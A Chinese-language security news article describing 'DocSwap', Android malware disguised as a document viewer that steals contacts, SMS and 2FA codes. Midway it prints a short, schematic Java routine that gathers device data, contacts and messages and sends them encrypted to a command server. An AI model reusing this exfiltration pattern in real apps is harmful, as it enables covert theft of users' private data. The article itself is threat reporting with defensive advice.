一场名为 “DocSwap” 的复杂恶意软件攻击活动浮出水面，它伪装成一款合法的文档安全与查看应用程序，将全球的Android 用户作为攻击目标。

该恶意软件运用社会工程策略，诱骗用户安装看似是生产力工具的程序，实则在受害者设备上悄然建立持久存在，并窃取敏感信息。

最初的感染通常通过网络钓鱼邮件或受攻击的网站进行，这些邮件和网站将这款假的文档查看器宣传为安全打开 PDF 和办公文件的解决方案。

安装后，DocSwap 会请求广泛的权限，包括访问联系人、存储以及短信功能。

S2W 安全分析师指出，一旦安装，该恶意软件会使用加密协议与命令控制服务器建立连接，以此绕过标准检测方法。他们的分析显示，在过去三周内，亚洲、欧洲和北美的感染数量大幅激增。

该恶意软件采用了复杂的混淆技术来隐藏其恶意代码。当应用程序被打开时，它确实会展示文档查看功能，同时在后台执行其有效载荷，这使得普通用户很难检测到异常。

DocSwap 的核心功能依赖于一个原生库，该库执行以下代码：

private void exfiltrateData() {

String deviceInfo = getDeviceInfo();

String contactsList = getContacts();

String smsData = getMessages();

new AsyncTask() {

@Override

protected Void doInBackground(Void… params) {

sendToC2Server(encryptData(deviceInfo + contactsList + smsData));

return null;

}

}.execute();}

攻击分析

该恶意软件采用多阶段感染过程，起始于一个释放器组件。这个初始有效载荷看似无害，但包含一个加密的有效载荷，该载荷会在预定延迟后解密。

这种技术有助于躲避安全研究人员常用的沙盒分析和动态扫描工具。

对网络流量的分析表明，DocSwap 主要与位于东欧和东南亚的服务器通信，使用一种模仿合法 HTTPS 流量的自定义协议。

DocSwap 最令人担忧的方面是它能够拦截并转发身份验证短信，这可能危及双因素身份验证。

安全专家建议立即卸载任何可疑的文档查看应用程序，并使用可靠的杀毒软件对设备进行全面扫描。用户还应启用谷歌应用商店保护功能，并避免从未知来源安装应用程序。

文章原文链接:https://www.anquanke.com/post/id/305179